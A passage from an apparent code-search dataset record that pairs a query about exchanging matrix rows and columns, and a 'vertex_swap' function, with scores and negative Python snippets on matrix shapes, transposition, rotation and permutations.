1 # so dof is 1", "def nD(self):\n return self.locations.shape[0]", "def dim(self) -> tuple:\n if self.expr_list: return (self.expr_list[0].size()[0], len(self.expr_list)) + self.expr_list[0].size()[1:]\n elif self.expr_tensor is not None: return self.expr_tensor.size()\n elif self.expr_transposed_tensor is not None:\n return (self.expr_transposed_tensor.size()[1], self.expr_transposed_tensor.size()[0]) + self.expr_transposed_tensor.size()[2:]\n else:\n raise NotImplementedError()", "def dim_calculator():\r\n probe_set = np.arange(1, 101)\r\n X = -36 + ((probe_set - 1) // 10) * 4\r\n Y = 2 - ((probe_set - 1) % 10) * 4\r\n dim = np.vstack((X, Y)).T\r\n return dim", "def size(self) -> int:\n return int(np.multiply(*self.shape))", "def size(self):\n if type(self._shape).__name__ == 'tuple':\n return self._shape[-1]\n else:\n return self._shape", "def get_num_dimensions(self):\n dimensions = self.data.shape\n return dimensions[1]", "def dim(self):\n return (self.n, )", "def __len__(self):\n # type: () -> int\n return self.shape[0]", "def ncells(self):\n return self.izone.size", "def nD(self):\n return self.locations.shape[0] * len(self.components)", "def getDim(self):\n return \"%dx%d\" % (self.rows, self.cols)", "def matShape(mat):\n return (len(mat),len(mat[0]))", "def ndim(self) -> int:\r\n return len(self.plates)", "def get_dof(self):\n return len(self.a_n)", "def dim(self):\n\t\treturn self.D", "def __len__(self):\r\n return int(np.ceil(len(self.pathways) / float(self.batch_size)))", "def nx(self):\n return self.__nx-2*self.pml_length", "def get_grid_width(self):\n # replace with your code\n return 0", "def num_quadrature_points(self) -> int:", "def rows(self) -> int:\n return self.__squares.__len__()", "def get_input_dim(self) -> int:\n raise NotImplementedError", "def num_cells(self):\n if hasattr(self, '__num_cells__'):\n return self.__num_cells__\n if self.x is not None:\n return self.x.size(self.__cat_dim__('x', self.x))\n if self.boundary_index is not None:\n return int(self.boundary_index[1,:].max()) + 1\n assert self.upper_index is None and self.lower_index is None\n return None", "def dim(self,mat):\n result = np.shape(mat)\n self.dimensions = result\n return self.dimensions", "def get_dimension_length(self):\n pass", "def nsites(self) -> int:\n return len(self.A)", "def num_parameters(self) -> int:\n return len(self.w) + prod(self.v.shape) - len(self.v)", "def width(self):\n return self.i_node.distance(self.j_node)" ]
[ "0.67515165", "0.67112654", "0.6535919", "0.653394", "0.64353853", "0.6379742", "0.63764715", "0.63629043", "0.63574785", "0.63428813", "0.62986326", "0.6278618", "0.62567246", "0.62425613", "0.6237966", "0.6212587", "0.6183233", "0.61782753", "0.61762774", "0.61756885", "0.6173078", "0.6171133", "0.61695725", "0.61553955", "0.6145848", "0.6143558", "0.6143558", "0.61384237", "0.6121866", "0.61109114", "0.61099464", "0.6102169", "0.6100881", "0.60988355", "0.60914415", "0.60912895", "0.60797006", "0.60751504", "0.6073545", "0.60726696", "0.60682726", "0.6066201", "0.6063794", "0.60608405", "0.60524803", "0.60439014", "0.6034139", "0.60324085", "0.6028394", "0.6027569", "0.6025686", "0.6020437", "0.6018058", "0.60153395", "0.60114664", "0.6006208", "0.59950763", "0.5992419", "0.5992419", "0.59921795", "0.5989881", "0.5983861", "0.5976259", "0.5972445", "0.59680414", "0.5966377", "0.5965046", "0.5964087", "0.5961787", "0.5957779", "0.59314173", "0.59222436", "0.5918292", "0.59114695", "0.590334", "0.5899204", "0.5881982", "0.5875742", "0.58710384", "0.58633184", "0.5856082", "0.58543617", "0.5853011", "0.5848631", "0.5846997", "0.5846564", "0.5841678", "0.58262444", "0.58250344", "0.5819995", "0.5819645", "0.5818771", "0.58114475", "0.581131", "0.5804395", "0.5800937", "0.5800435", "0.5798782", "0.5794297", "0.5786859", "0.5782895" ]
0.0
-1
r""" Permutations (i1,j1) > (i2,j2) Make an exchange of rows/columns in matrix data. This is used in multiplication of full symbolic matrices.
def vertex_swap(d, n, l, i1, i2, j1, j2): if i1 == i2 and j1 == j2: return l if i1 == j1: # (i1,i1) -> (i2,i2) assert i2 == j2 def swap(v): swap2(d, n, v, i1, i2) elif i1 == i2: # (i,j1) -> (i,j2) def swap(v): swap2(d, n, v, j1, j2) elif j1 == j2: # (i1,j) -> (i2,j) def swap(v): swap2(d, n, v, i1, i2) elif i1 == j2 and i2 == j1: # (i1,j1) -> (j1,i1) def swap(v): swap2(d, n, v, i1, j1) elif i1 == j2: # (i1,j1) -> (i2,i1) def swap(v): swap3(d, n, v, j1, i1, i2) elif i2 == j1: # (i1,j1) -> (j1,j2) def swap(v): swap3(d, n, v, i1, j1, j2) else: # (i1,j1) -> (i2,j2) def swap(v): swap2(d, n, v, i1, i2) swap2(d, n, v, j1, j2) ll = [] for v in l: v = v.__copy__() swap(v) v.set_immutable() ll.append(v) ll.sort() return tuple(ll)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def swap_columns(i, j, *args):\n output = list()\n for M in args:\n output.append(_cswap(i, j, M))\n return output", "def swap_rows(i, j, *args):\n output = list()\n for M in args:\n output.append(_rswap(i, j, M))\n return output", "def return_swaps( # pylint: disable=too-many-locals,too-many-branches,too-many-statements\n self, old_mapping, new_mapping, permutation=None\n ):\n if permutation is None:\n permutation = list(range(self.num_rows))\n swap_operations = []\n\n class Position: # pylint: disable=too-few-public-methods\n \"\"\"Custom Container.\"\"\"\n\n def __init__( # pylint: disable=too-many-arguments\n self,\n current_row,\n current_column,\n final_row,\n final_column,\n row_after_step_1=None,\n ):\n self.current_row = current_row\n self.current_column = current_column\n self.final_row = final_row\n self.final_column = final_column\n self.row_after_step_1 = row_after_step_1\n\n # final_positions contains info containers\n # final_position[i][j] contains info container with\n # current_row == i and current_column == j\n final_positions = [[None for i in range(self.num_columns)] for j in range(self.num_rows)]\n # move qubits which are in both mappings\n used_mapped_ids = set()\n for logical_id in old_mapping:\n if logical_id in new_mapping:\n used_mapped_ids.add(new_mapping[logical_id])\n old_column = old_mapping[logical_id] % self.num_columns\n old_row = old_mapping[logical_id] // self.num_columns\n new_column = new_mapping[logical_id] % self.num_columns\n new_row = new_mapping[logical_id] // self.num_columns\n info_container = Position(\n current_row=old_row,\n current_column=old_column,\n final_row=new_row,\n final_column=new_column,\n )\n final_positions[old_row][old_column] = info_container\n # exchange all remaining None with the not yet used mapped ids\n all_ids = set(range(self.num_qubits))\n not_used_mapped_ids = list(all_ids.difference(used_mapped_ids))\n not_used_mapped_ids = sorted(not_used_mapped_ids, reverse=True)\n for row in range(self.num_rows):\n for column in range(self.num_columns):\n if final_positions[row][column] is None:\n mapped_id = not_used_mapped_ids.pop()\n new_column = mapped_id % self.num_columns\n new_row = mapped_id // self.num_columns\n info_container = Position(\n current_row=row,\n current_column=column,\n final_row=new_row,\n final_column=new_column,\n )\n final_positions[row][column] = info_container\n if len(not_used_mapped_ids) > 0: # pragma: no cover\n raise RuntimeError('Internal compiler error: len(not_used_mapped_ids) > 0')\n # 1. Assign column_after_step_1 for each element\n # Matching contains the num_columns matchings\n matchings = [None for i in range(self.num_rows)]\n # Build bipartite graph. Nodes are the current columns numbered (0, 1, ...) and the destination columns\n # numbered with an offset of self.num_columns (0 + offset, 1+offset, ...)\n graph = nx.Graph()\n offset = self.num_columns\n graph.add_nodes_from(range(self.num_columns), bipartite=0)\n graph.add_nodes_from(range(offset, offset + self.num_columns), bipartite=1)\n # Add an edge to the graph from (i, j+offset) for every element currently in column i which should go to\n # column j for the new mapping\n for row in range(self.num_rows):\n for column in range(self.num_columns):\n destination_column = final_positions[row][column].final_column\n if not graph.has_edge(column, destination_column + offset):\n graph.add_edge(column, destination_column + offset)\n # Keep manual track of multiple edges between nodes\n graph[column][destination_column + offset]['num'] = 1\n else:\n graph[column][destination_column + offset]['num'] += 1\n # Find perfect matching, remove those edges from the graph and do it again:\n for i in range(self.num_rows):\n top_nodes = range(self.num_columns)\n matching = nx.bipartite.maximum_matching(graph, top_nodes)\n matchings[i] = matching\n # Remove all edges of the current perfect matching\n for node in range(self.num_columns):\n if graph[node][matching[node]]['num'] == 1:\n graph.remove_edge(node, matching[node])\n else:\n graph[node][matching[node]]['num'] -= 1\n # permute the matchings:\n tmp = deepcopy(matchings)\n for i in range(self.num_rows):\n matchings[i] = tmp[permutation[i]]\n # Assign row_after_step_1\n for column in range(self.num_columns):\n for row_after_step_1 in range(self.num_rows):\n dest_column = matchings[row_after_step_1][column] - offset\n best_element = None\n for row in range(self.num_rows):\n element = final_positions[row][column]\n if element.row_after_step_1 is not None:\n continue\n if element.final_column == dest_column:\n if best_element is None:\n best_element = element\n elif best_element.final_row > element.final_row:\n best_element = element\n best_element.row_after_step_1 = row_after_step_1\n # 2. Sort inside all the rows\n swaps = self._sort_within_columns(final_positions=final_positions, key=lambda x: x.row_after_step_1)\n swap_operations += swaps\n # 3. Sort inside all the columns\n swaps = self._sort_within_rows(final_positions=final_positions, key=lambda x: x.final_column)\n swap_operations += swaps\n # 4. Sort inside all the rows\n swaps = self._sort_within_columns(final_positions=final_positions, key=lambda x: x.final_row)\n swap_operations += swaps\n return swap_operations", "def permutation_matrix(order):\n matrix = np.zeros([order,order])\n matrix[-1,0] = 1\n matrix[0:-1,1::] = np.identity(order-1)\n return matrix", "def xor(m, i, j):\n for e in range(len(m[0])):\n m[j][e] ^= m[i][e]\n return m", "def transpose(m):\n\n pass", "def reverse_matrix(self):\n return SWAP.matrix @ self.matrix @ SWAP.matrix", "def perform_gauss_jordan_elimination(m, show):\n if show:\n print(\"Initial State\")\n print_matrix(m)\n\n r, c = 0, 0\n rows = len(m)\n cols = len(m[0])\n\n if show:\n print(\"rows: %s cols: %s\"%(rows, cols))\n\n while True:\n _swap = False\n\n if show:\n print(\"r %s c %s\"%(r, c))\n\n ## Check Pivot\n if m[r][c] == 0:\n ## Swap\n for i in range(rows):\n if r != i and i > r: ## Avoid comparing the same row and do not swap to upper rows\n if m[i][c] == 1 and not _swap: ## Check if a swap is not performed before in the same column\n if show:\n print(\"Swapping %s %s and %s %s\"%(r, m[r], i, m[i]))\n #m = swap(m,r,i)\n temp = m[r]\n m[r] = m[i]\n m[i] = temp\n _swap = True\n if show:\n print_matrix(m)\n if not _swap: ## If not swap, means there is no 1 to swap, so go to the next column\n c+=1\n\n if m[r][c] == 1:\n ## XOR\n for i in range(rows):\n if r != i: ## Avoid comparing the same row\n if m[i][c] == 1:\n if show:\n print(\"XOR Row %s: %s into Row %s: %s\"%(r, m[r], i, m[i]))\n for e in range(len(m[0])):\n m[i][e] ^= m[r][e]\n if show:\n print_matrix(m)\n\n ## Increase row and column\n r+=1\n c+=1\n\n ## break condition if all rows or all columns (except the augmented column are treated)\n if r == rows or c >= cols-1:\n break\n \n return m", "def jmatswap(ind: int):\n return _jmswap[ind - 1]", "def _swap_permutation(i, j, permutation_vector):\n permutation_vector[i], permutation_vector[j] = permutation_vector[j], permutation_vector[i]", "def transpose(self):\n order = list(self.order)\n order[-2], order[-1] = order[-1], order[-2]\n self.order = order", "def perm2(a,ix):\n if ix==len(a):\n print(a)\n else:\n for j in range(ix+1):\n swap(a,j,ix)\n perm2(a,ix+1)\n swap(a,j,ix)", "def swap(permutation, transposition, remaining=[]):\n i, j = transposition\n nb_positions = len(permutation)\n res = np.array(permutation)\n\n if j < nb_positions:\n res[i], res[j] = res[j], res[i]\n else:\n res[i] = remaining[j-nb_positions]\n\n return tuple(res)", "def _swap(self, i, j, k):\n\t\tif self.verbose:\n\t\t\tprint(i, k)\n\t\t\tprint(i, j)\n\t\t\tprint(j, k)\n\t\tself.arrangement[i],self.arrangement[k] = self.arrangement[k],self.arrangement[i]\n\t\tself.arrangement[i],self.arrangement[j] = self.arrangement[j],self.arrangement[i]\n\t\tself.arrangement[j],self.arrangement[k] = self.arrangement[k],self.arrangement[j]", "def _multi_matmul_chain_order(arrays):\n n = len(arrays)\n # p stores the dimensions of the matrices\n # Example for p: A_{10x100}, B_{100x5}, C_{5x50} --> p = [10, 100, 5, 50]\n # Using -2 to generalize for shapes that are more than 2 dimmensions\n p = [a.shape[-2] for a in arrays] + [arrays[-1].shape[-1]]\n # m is a matrix of costs of the subproblems\n # m[i,j]: min number of scalar multiplications needed to compute A_{i..j}\n m = np.zeros((n, n), dtype=np.double)\n # s is the actual ordering\n # s[i, j] is the value of k at which we split the product A_i..A_j\n s = np.empty((n, n), dtype=np.intp)\n\n for l in range(1, n):\n for i in range(n - l):\n j = i + l\n m[i, j] = np.inf\n for k in range(i, j):\n q = m[i, k] + m[k + 1, j] + p[i] * p[k + 1] * p[j + 1]\n if q < m[i, j]:\n m[i, j] = q\n s[i, j] = k # Note that Cormen uses 1-based index\n return s", "def rotate(self, matrix: List[List[int]]) -> None:\r\n n = len(matrix)\r\n for j in range((n+1)//2):\r\n for i in range(n-2*j-1):\r\n matrix[j][j+i], matrix[j+i][n-1-j], matrix[n-1-j][n-1-j-i], matrix[n-1-j-i][j] = matrix[n-1-j-i][j], matrix[j][j+i], matrix[j+i][n-1-j], matrix[n-1-j][n-1-j-i]", "def rotate(self, matrix: List[List[int]]) -> None:\n # note: coded up logic after looking at discussion board\n\n # 1 - swap symmetrically across diagonal so that 123 becomes the first column\n # leftIndent = 0\n n = len(matrix)\n # for i in range(len(matrix)):\n for i in range(n):\n # indent (to only iterate top side of diagonal) adds 1 per line, so same as i\n # for j in range(i, len(matrix[i])):\n for j in range(i, n):\n # print(matrix[i][j], matrix[j][i])\n # print()\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n\n # print(matrix)\n # 2 - swap elements in individual rows to swap order of columns (since 123 should be last column)\n # for i in range(len(matrix)):\n for i in range(n):\n # for j in range(len(matrix)):\n # print(\"new row: \", matrix[i])\n left = 0\n right = len(matrix[i]) - 1\n while (left <= right):\n # print(\"left: \", left, \" right: \", right, matrix[i][left], matrix[i][right])\n matrix[i][left], matrix[i][right] = matrix[i][right], matrix[i][left]\n left += 1\n right -= 1\n # print(matrix)\n # print()", "def swapColumns(self, i, j):\n if not (type(i) in MATRIX_VALID_INTS and type(\n j) in MATRIX_VALID_INTS): # this should be fixed to accomodate 'long' types\n raise TypeError(\"Row indices must be of type 'int'\")\n columnA = self.deleteColumn(max(i, j))\n columnB = self.deleteColumn(min(i, j))\n self.insertColumn(min(i, j), *columnA)\n self.insertColumn(max(i, j), *columnB)", "def derMatrix(Bulk_Operators, Bdy_Operators, Bulk_second, s=1):\n\t\tMatrix = []\n\t\tfor i in range(1, M_max + 1):\n\t\t\t\trow = []\n\t\t\t\tfor Bulk_Op in Bulk_Operators:\n\t\t\t\t\t\ttable_call = N*table1.table[0, i].subs({\"Delta\":Bulk_Op, \"Delta_12\":delta_12, \"Xi\":1.00})\n\t\t\t\t\t\trow.append(table_call)\n\t\t\t\tfor index in range(len(Bulk_second)):\n\t\t\t\t\t\trow.append(0*table1.table[0,0])\n\t\t\t\tfor Bdy_Op in Bdy_Operators:\n\t\t\t\t\tif Bdy_Op == 2.0:\n\t\t\t\t\t\t\tprint(\"here\")\n\t\t\t\t\t\t\ttable_call = (N-1)*table1.table[1, i].subs({\"Delta\":Bdy_Op, \"Xi\":1.00})\n\t\t\t\t\telse:\n\t\t\t\t\t\ttable_call = table1.table[1, i].subs({\"Delta\":Bdy_Op, \"Xi\":1.00})\n\t\t\t\t\trow.append(table_call)\n\t\t\t\tXi = symbols('Xi')\n\t\t\t\tif s == 1:\n\t\t\t\t\t\tlast_expr = Xi**((delta_1 + delta_2)/2)\n\t\t\t\t\t\tlast_elem = diff(last_expr, Xi, i).subs({\"Xi\":1.00}).evalf()\n\t\t\t\t\t\trow.append(last_elem)\n\t\t\t\tMatrix.append(row)\n\t\t\t\trow2 = []\n\t\t\t\tfor index in range(len(Bulk_Operators)):\n\t\t\t\t\t\trow2.append(0*table1.table[0,0])\n\t\t\t\tfor Bulk_Op in Bulk_second:\n\t\t\t\t\t\ttable_call = table1.table[0, i].subs({\"Delta\":Bulk_Op, \"Delta_12\":delta_12, \"Xi\":1.00})\n\t\t\t\t\t\trow2.append(table_call)\n\t\t\t\tfor Bdy_Op in Bdy_Operators:\n\t\t\t\t\t\tif Bdy_Op == 2.0:\n\t\t\t\t\t\t\tprint(\"here\")\n\t\t\t\t\t\t\ttable_call = -1*table1.table[1, i].subs({\"Delta\":Bdy_Op, \"Xi\":1.00})\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttable_call = table1.table[1, i].subs({\"Delta\":Bdy_Op, \"Xi\":1.00})\n\t\t\t\t\t\trow2.append(table_call)\n\t\t\t\tXi = symbols('Xi')\n\t\t\t\tif s == 1:\n\t\t\t\t\t\tlast_expr = Xi**((delta_1 + delta_2)/2)\n\t\t\t\t\t\tlast_elem = diff(last_expr, Xi, i).subs({\"Xi\":1.00}).evalf()\n\t\t\t\t\t\trow2.append(last_elem)\n\t\t\t\tMatrix.append(row2)\t\t\n\t\treturn np.array(Matrix)", "def transpose():", "def test_distance_matrix_permutation_test_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return (\r\n [distance_matrix_permutation_test(*args)[2] for i in range(10)]\r\n )\r\n\r\n m = array([[0, 1, 3], [1, 2, 4], [3, 4, 5]])\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n n = 100\r\n\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='high')\r\n self.assertSimilarMeans(r, 0.77281447417149496, 0)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='low')\r\n self.assertSimilarMeans(r, 4. / 6.)\r\n\r\n # The following lines are not part of the test code, but are useful in\r\n # figuring out what t-scores all of the permutations will yield.\r\n # permutes = [[0, 1, 2], [0, 2, 1], [1, 0, 2],\\\r\n # [1, 2, 0], [2, 0, 1], [2, 1, 0]]\r\n #results = []\r\n # for p in permutes:\r\n # p_m = permute_2d(m,p)\r\n # results.append(t_two_sample(\\\r\n # [p_m[0,1],p_m[0,2]],[p_m[2,1]],tails='high'))\r\n # print results\r", "def rotate1(self, matrix: List[List[int]]) -> None:\n matrixLen = len(matrix)\n\n for i in range(matrixLen):\n for j in range(i, matrixLen):\n print(i, j)\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n\n for i in range(matrixLen):\n for j in range(matrixLen // 2):\n matrix[i][j], matrix[i][matrixLen - 1 - j] = matrix[i][matrixLen - 1 - j], matrix[i][j]", "def test_dim2(self):\r\n # Each row of p is a different permutation to inverse\r\n p = imatrix()\r\n inv = inverse_permutation(p)\r\n f_inverse = function([p], inv)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n # Generate 10 random permutations\r\n p_val = numpy.asarray([rng.permutation(10) for i in range(7)],\r\n dtype='int32')\r\n inv_val = f_inverse(p_val)\r\n\r\n # Check that the inverse of the inverse is the original permutation list\r\n assert numpy.all(f_inverse(inv_val) == p_val)\r\n # Check that, for each permutation,\r\n # permutation(inverse) == inverse(permutation) = identity\r\n for p_row, i_row in zip(p_val, inv_val):\r\n assert numpy.all(p_row[i_row] == numpy.arange(10))\r\n assert numpy.all(i_row[p_row] == numpy.arange(10))", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for dig in range(n):\n row = dig\n for col in range(dig+1, n):\n matrix[row][col] , matrix[col][row] = matrix[col][row], matrix[row][col]\n print(matrix)\n left = 0\n right = n-1\n while left < right:\n for row in range(n):\n matrix[row][left], matrix[row][right] = matrix[row][right], matrix[row][left]\n left+=1\n right-=1", "def perform_gauss_jordan_elimination_(m, show):\n if show:\n print(\"Initial State\")\n print_matrix(m)\n \n r = 0\n c = 0\n rows, cols = len(m), len(m[0])\n\n if show:\n print(\"rows: %s cols: %s\"%(rows, cols))\n\n while True:\n if show:\n print(\"r %s c %s\"%(r, c))\n\n ## Check Pivot\n _swap = False\n if m[r,c] == 0:\n for i in range(r+1,rows):\n if m[i,c] == 1:# If new pivot found... swap\n if show:\n print(\"Swapping %s %s and %s %s\"%(r, m[r], i, m[i]))\n m[[i,r]] = m[[r,i]] ## Swap\n _swap = True\n if show:\n print_matrix(m)\n break # No more swapping in this column\n if not _swap: ## No swap, move to the next column, same row\n c+=1\n\n if m[r,c] == 1:\n ## XOR\n for i in range(rows):\n indexes = np.setdiff1d(np.where(m[:,c] == 1),r) # Get all the ones to XOR in the same column\n for i in indexes:\n m[i] = np.bitwise_xor(m[i],m[r]) # Bitwise XOR\n if show:\n print(\"XOR Row %s: %s into Row %s: %s\"%(r, m[r], i, m[i]))\n if show:\n print_matrix(m)\n\n ## Increase row and column\n r+=1\n c+=1\n\n ## break condition if all rows or all columns (except the augmented column) are treated\n if r == rows or c >= cols-1:\n break\n\n if show:\n print(\"Final State\")\n print_matrix(m)\n \n return m", "def _clifford_swap(cls, slot_i, slot_j) -> Tensor:\n\n return Tensor(\n {\n Tensor._merge_keys((slot_j,), (slot_i,)): -1,\n Tensor._merge_keys(): 2 * cls.symmetric_bilinear_form(slot_i, slot_j),\n }\n )", "def rotate2D(self, matrix) -> None:\n N = len(matrix)\n\n # In case of N is odd, the innermost square belt is just one cell, no need of rotating.\n for i in range(0,int(N/2)): # outer loop for each square belt\t\t\t\n for j in range(i,N-i-1): # N-i group in the i-th square belt\n #print(i,j)\n tmp = matrix[i][j]\n matrix[i][j] = matrix[N-j-1][i]\n matrix[N-j-1][i] = matrix[N-i-1][N-j-1]\n matrix[N-i-1][N-j-1] = matrix[j][N-i-1]\n matrix[j][N-i-1] = tmp\n #print(matrix)", "def rotate(self, m):\n n = len(m)\n for i in range(n//2):\n for j in range(i,n-i-1):\n m[j][~i],m[~i][~j],m[~j][i],m[i][j] = \\\n m[i][j],m[j][~i],m[~i][~j],m[~j][i]", "def T(self):\n # TODO - your code here\n transpose = []\n for col in range(self.w):\n new_row = []\n for row in range(self.h):\n new_row.append(self.g[row][col])\n transpose.append(new_row)\n return Matrix(transpose)\n # TODO - your code here", "def _cswap(i, j, S):\n N = _rswap(i, j, S.transpose()).transpose()\n return N", "def transp(self, x1, x2, d):\n raise NotImplementedError", "def transpose(self):\n pass", "def commute_matrix(A):\n R = resistance_matrix(A)\n E = A.sum() / 2 # number of edges in graph\n C = 2 * E * R\n return C", "def test_distance_matrix_permutation_test_non_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return [distance_matrix_permutation_test(*args, **kwargs)[2]\r\n for i in range(10)]\r\n\r\n m = arange(9).reshape((3, 3))\r\n n = 100\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False,\r\n tails='high')\r\n self.assertSimilarMeans(r, 4. / 6.)\r\n r = make_result_list(\r\n m, [(0, 0), (0, 1), (0, 2)], n=n, is_symmetric=False,\r\n tails='low')\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n\r\n # looks at each possible permutation n times --\r\n # compare last row to rest\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False,\r\n tails='high')\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(\r\n m, [(2, 0), (2, 1), (2, 2)], n=n, is_symmetric=False,\r\n tails='low')\r\n self.assertSimilarMeans(r, 4. / 6.)", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix[0])\n for i in range(n // 2 + n % 2):\n for j in range(n // 2):\n tmp = matrix[n - 1 - j][i]\n matrix[n - 1 - j][i] = matrix[n - 1 - i][n - j - 1]\n matrix[n - 1 - i][n - j - 1] = matrix[j][n - 1 -i]\n matrix[j][n - 1 - i] = matrix[i][j]\n matrix[i][j] = tmp", "def transpose(self):\n return self.conjugate()", "def swap_cells(state, i1, j1, i2, j2):\n value1 = state[i1][j1]\n value2 = state[i2][j2]\n \n new_state = []\n for row in range(len(state)): \n new_row = []\n for column in range(len(state[row])): \n if row == i1 and column == j1: \n new_row.append(value2)\n elif row == i2 and column == j2:\n new_row.append(value1)\n else: \n new_row.append(state[row][column])\n new_state.append(tuple(new_row))\n return tuple(new_state)", "def transpose(self) -> None:\n ...", "def matrix_mult(m1, m2):\n\ttemp = []\n\tfor i in range(len(m1)):\n\t\te = []\n\t\tfor j in range(len(m2[0])):\n\t\t\te.append(row_times_column(m1,i,m2,j))\n\t\ttemp.append(e)\n\treturn temp", "def transpositions(self):\n a = self.cyclic_form\n res = []\n for x in a:\n nx = len(x)\n if nx == 2:\n res.append(tuple(x))\n elif nx > 2:\n first = x[0]\n for y in x[nx-1:0:-1]:\n res.append((first,y))\n return res", "def test_permute_2d(self):\r\n a = reshape(arange(9), (3, 3))\r\n self.assertEqual(permute_2d(a, [0, 1, 2]), a)\r\n self.assertEqual(permute_2d(a, [2, 1, 0]),\r\n array([[8, 7, 6], [5, 4, 3], [2, 1, 0]]))\r\n self.assertEqual(permute_2d(a, [1, 2, 0]),\r\n array([[4, 5, 3], [7, 8, 6], [1, 2, 0]]))", "def commutes_with(self, other):\n a = self.array_form\n b = other.array_form\n if len(a) != len(b):\n raise ValueError(\"The number of elements in the permutations \\\ndon\\'t match.\")\n for i in range(len(a)-1):\n if a[b[i]] != b[a[i]]:\n return False\n return True", "def _rswap(i, j, S):\n N = copy.deepcopy(S)\n row = copy.deepcopy(N[i])\n N[i] = copy.deepcopy(N[j])\n N[j] = row\n return N", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for i in range(n):\n for j in range(i+1):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n for i in range(n//2):\n for j in range(n):\n matrix[j][i], matrix[j][n-i-1] = matrix[j][n-i-1], matrix[j][i]\n return matrix", "def _flip_vectors(jn_matrix, m_matrix):\r\n m_matrix_trans = m_matrix.transpose()\r\n jn_matrix_trans = jn_matrix.transpose()\r\n new_matrix = zeros(jn_matrix_trans.shape, float)\r\n for i, m_vector in enumerate(m_matrix_trans):\r\n jn_vector = jn_matrix_trans[i]\r\n disT = list(m_vector - jn_vector)\r\n disT = sum(map(abs, disT))\r\n jn_flip = jn_vector * [-1]\r\n disF = list(m_vector - jn_flip)\r\n disF = sum(map(abs, disF))\r\n if disT > disF:\r\n new_matrix[i] = jn_flip\r\n else:\r\n new_matrix[i] = jn_vector\r\n return new_matrix.transpose()", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for i in range(n - 1):\n for j in range(n - 1 - i):\n matrix[i][j], matrix[n-1-j][n-1-i] = matrix[n-1-j][n-1-i], matrix[i][j]\n for i in range(n):\n for j in range(n // 2):\n matrix[j][i], matrix[n-1-j][i] = matrix[n-1-j][i], matrix[j][i]", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for l in range(n // 2):\n r = n - 1 - l\n for p in range(l, r):\n q = n - 1 - p\n cache = matrix[l][p]\n matrix[l][p] = matrix[q][l]\n matrix[q][l] = matrix[r][q]\n matrix[r][q] = matrix[p][r]\n matrix[p][r] = cache", "def rotateMatrixAttempt(matrix):\n for idxring in range(len(matrix) / 2):\n swap = []\n ringgen = ringCoords(len(matrix), idxring)\n for x, y in ringgen:\n swap.append(matrix[y][x])\n ringgen = ringCoords(len(matrix), idxring)\n start_idx = len(matrix) - 1 - idxring\n for swapidx in range(-1 * start_idx, len(swap) - start_idx):\n x, y = ringgen.next()\n matrix[y][x] = swap[swapidx]", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n if n <= 1:\n return\n\n for i in range((n + 1)//2):\n for j in range(i, n - 1 - i):\n tmp = matrix[i][j]\n matrix[i][j] = matrix[n - 1 - j][i]\n matrix[n - 1 - j][i] = matrix[n - 1 - i][n - 1 - j]\n matrix[n - 1 - i][n - 1 - j] = matrix[j][n - 1 - i]\n matrix[j][n - 1 - i] = tmp", "def build_symmetry_operations(symmetry: List[Any]) -> None:\n dim = len(symmetry[0][0])\n unit = numpy.identity(dim, dtype=int)\n for permutation in symmetry:\n perm = unit[:, numpy.argsort(permutation[0])]\n permutation[0] = perm", "def mat24_perm_to_int(p):\n oct = sum(1 << x for x in p[:8])\n res = gc.vect_to_octad(oct) \n #print(\"p2i oct\", hex(oct))\n res -= STD_OCTAD\n res += (res >> 12) & 759 \n #print(\"p2i\", res)\n p1 = [24]*32\n oct, j = 8 * oct, 0x00 \n for i in range(24):\n o = oct & 8\n p1[i] = (j >> o) & 0x1f\n j += 1 << o\n oct >>= 1\n q, q_inv = [None]*8, [None]*8\n for i in range(8):\n j = p1[p[i] & 0x1f] & 7\n q[j] = i\n q_inv[i] = j\n for i in range(6):\n # exchange place i with place q_inv[i]\n j = q_inv[i]\n #q_inv[q[i]], q_inv[q[j]] = q_inv[q[j]], q_inv[q[i]]\n #q[i], q[j] = q[j], q[i]\n #assert q[:i] == q_inv[:i] == lrange(i)\n q_inv[q[i]] = q_inv[q[j]]\n q[j] = q[i]\n #print(\"p2i%d\" % i, j-i) \n res = res * (8 - i) + j - i\n #print(\"p2ifinal\", p1[p[8] & 0x1f]) \n return 16 * res + p1[p[8] & 0x1f]", "def Jac(M):\n x = [sy.Dummy() for _ in range(nargs(M))]\n y = M(*x)\n J = [sy.diff(yi, xi) for yi in y for xi in x]\n return sy.lambdify(x, J, 'sympy')", "def apply_columns_recursive_inplace(self, mat1: 'Nparray',\n mat2: 'Nparray') -> None:\n trans = FqeData(self.nbeta(),\n self.nalpha(),\n self.norb(),\n self._core.alpha_beta_transpose(),\n 